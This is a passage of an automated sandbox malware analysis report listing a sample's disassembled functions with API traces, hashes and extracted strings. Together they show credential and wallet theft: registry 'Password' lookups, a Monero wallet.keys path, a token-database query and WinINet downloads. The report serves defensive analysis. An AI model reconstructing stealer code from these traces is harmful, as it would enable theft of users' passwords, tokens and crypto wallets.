                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 9477288ebb62889b9f8f5e200efd27f9033faa54ae4cf92e82ab000bc80995fb
                                  • Instruction ID: 00f80c4d99a7eea96fba1c819cd4e6c90c1f6a309f3f8f358bb2ae05321cc8b6
                                  • Opcode Fuzzy Hash: 9477288ebb62889b9f8f5e200efd27f9033faa54ae4cf92e82ab000bc80995fb
                                  • Instruction Fuzzy Hash: 715143B1900319ABDB20EF64DC85BEE77B8EB45705F1080D8B605BB1C1DBB46A85CFA5
                                  Function 00BA72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA73B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA7452
                                  • HeapFree.KERNEL32(00000000), ref: 00BA7459
                                  • task.LIBCPMTD ref: 00BA7555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 4f1c24f7aad1a0cf5abc659b9f781ce0705e374113e5798f4b82a095a69960dc
                                  • Instruction ID: cf4cf7a486a07d23d58914b15a8e09ad91de331bfe9d9d267f86181126532d1a
                                  • Opcode Fuzzy Hash: 4f1c24f7aad1a0cf5abc659b9f781ce0705e374113e5798f4b82a095a69960dc
                                  • Instruction Fuzzy Hash: 9461F9B5D482589BDB24DB50DC85BD9B7F8BF49300F0081E9E649A6241EF706BC9CFA1
                                  Function 00BABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00BABC9F
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BABCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00BABDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00BABDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: d5ba85ad3f2ea3db2c4d94405c5210eaabda84f4f8015f4ff0814f2dbfa75df4
                                  • Instruction ID: 6473d87f78af2398de04f3d251a6c34a34a5ec15d2b88b733889ee49c8241db2
                                  • Opcode Fuzzy Hash: d5ba85ad3f2ea3db2c4d94405c5210eaabda84f4f8015f4ff0814f2dbfa75df4
                                  • Instruction Fuzzy Hash: 23B13E71D10108ABDB14FBA4DC96EFE73B8AF54300F4045A8F506B6592EF746A49CBA2
                                  Function 00BB6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 9468cb9c70062c10beab7e74b6f337f3f855300c1340893c46cb3504197e1aa3
                                  • Instruction ID: e65ace1ab6a136f602d940f97a4b0c320afe9a5974db11e41329ff4875c55450
                                  • Opcode Fuzzy Hash: 9468cb9c70062c10beab7e74b6f337f3f855300c1340893c46cb3504197e1aa3
                                  • Instruction Fuzzy Hash: 63F03A3490438AEFD344FFE9A94976C7B70FB04706F050199E609CA390DA746E419BE6
                                  Function 00BA4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BA4FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA4FD1
                                  • InternetOpenA.WININET(00BC0DDF,00000000,00000000,00000000,00000000), ref: 00BA4FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BA5011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BA5041
                                  • InternetCloseHandle.WININET(?), ref: 00BA50B9
                                  • InternetCloseHandle.WININET(?), ref: 00BA50C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: eb9e86324f281fe6d6291858b72a2c8d921b3830bd6207512c2e87c592ec403b
                                  • Instruction ID: dc917aa1e6c2cbc8304b4b0cedd0bd493af1bf827809bbdcb0269c82beeab7c2
                                  • Opcode Fuzzy Hash: eb9e86324f281fe6d6291858b72a2c8d921b3830bd6207512c2e87c592ec403b
                                  • Instruction Fuzzy Hash: 6931F6B4A00218ABDB20DF54DC85BDDB7B4EB48704F5081D9FB09A7281D7B06EC58FA9
                                  Function 00BB83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB8426
                                  • wsprintfA.USER32 ref: 00BB8459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8499
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,014108F8,00000000,000F003F,?,00000400), ref: 00BB84EC
                                  • lstrlen.KERNEL32(?), ref: 00BB8501
                                  • RegQueryValueExA.ADVAPI32(00000000,01410760,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BC0B34), ref: 00BB8599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 52347f296c281ac9ac06ca90cc39464bd158589c6e0aab80931b6750929eeeed
                                  • Instruction ID: d2eb4642c129e481aa380a9ac5821b58d61514feec205eae60aba7ab3eea9bc8
                                  • Opcode Fuzzy Hash: 52347f296c281ac9ac06ca90cc39464bd158589c6e0aab80931b6750929eeeed
                                  • Instruction Fuzzy Hash: F721B771910218ABDB24EB54DC85FE9B7B9FB48704F00C5D9A609A6240DFB1AA85CFE4
                                  Function 00BB7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB76A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB76AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FB728,00000000,00020119,00000000), ref: 00BB76DD
                                  • RegQueryValueExA.ADVAPI32(00000000,014106D0,00000000,00000000,?,000000FF), ref: 00BB76FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB7708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: a789d7bc7bd2bca568908c6ec11fcc413ce5438411578089dd6fc0304428f388
                                  • Instruction ID: 3eb545eeefaefe62d2bd6abcaefb3abf178f867a2c8ff096608772ff9c8fc8e1
                                  • Opcode Fuzzy Hash: a789d7bc7bd2bca568908c6ec11fcc413ce5438411578089dd6fc0304428f388
                                  • Instruction Fuzzy Hash: 38014FB5A44309BBD700EBE9DC89FB9B7B8EB48701F104095FA05DB290DAB0A9048B61
                                  Function 00BB7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FB728,00000000,00020119,00BB76B9), ref: 00BB775B
                                  • RegQueryValueExA.ADVAPI32(00BB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BB777A
                                  • RegCloseKey.ADVAPI32(00BB76B9), ref: 00BB7784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 04a13a58311972b851fea1e901e4d7d6c5f36508ed38e05744dd186bfdf33749
                                  • Instruction ID: 27d309435d6876eafe9905cc1ee98534955ca1cc0c44cd32011275258843d120
                                  • Opcode Fuzzy Hash: 04a13a58311972b851fea1e901e4d7d6c5f36508ed38e05744dd186bfdf33749
                                  • Instruction Fuzzy Hash: C401F4B5A40349BBDB10EBE4DC89FAEB7B8EB44705F104599FA05EB291DA7069008B61
                                  Function 00BA99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                  • LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 6c22913e1e602a3dcb675154d167e8ea152f9f8ce11444a6749259ac313ce734
                                  • Instruction ID: 4d00e031f243c431e37844c064586078bb562f9e8ada0aadf6adabb5a1d69fad
                                  • Opcode Fuzzy Hash: 6c22913e1e602a3dcb675154d167e8ea152f9f8ce11444a6749259ac313ce734
                                  • Instruction Fuzzy Hash: 2E3116B4A00209EFDB14DF94C885BAE77F5FF49300F108199E915AB390D774AA41DFA1
                                  Function 00BB4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,01410958), ref: 00BB47DB
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4801
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4820
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4834
                                  • lstrcat.KERNEL32(?,013FA540), ref: 00BB4847
                                  • lstrcat.KERNEL32(?,?), ref: 00BB485B
                                  • lstrcat.KERNEL32(?,0140F718), ref: 00BB486F
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8D90: GetFileAttributesA.KERNEL32(00000000,?,00BA1B54,?,?,00BC564C,?,?,00BC0E1F), ref: 00BB8D9F
                                    • Part of subcall function 00BB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB4580
                                    • Part of subcall function 00BB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BB4587
                                    • Part of subcall function 00BB4570: wsprintfA.USER32 ref: 00BB45A6
                                    • Part of subcall function 00BB4570: FindFirstFileA.KERNEL32(?,?), ref: 00BB45BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
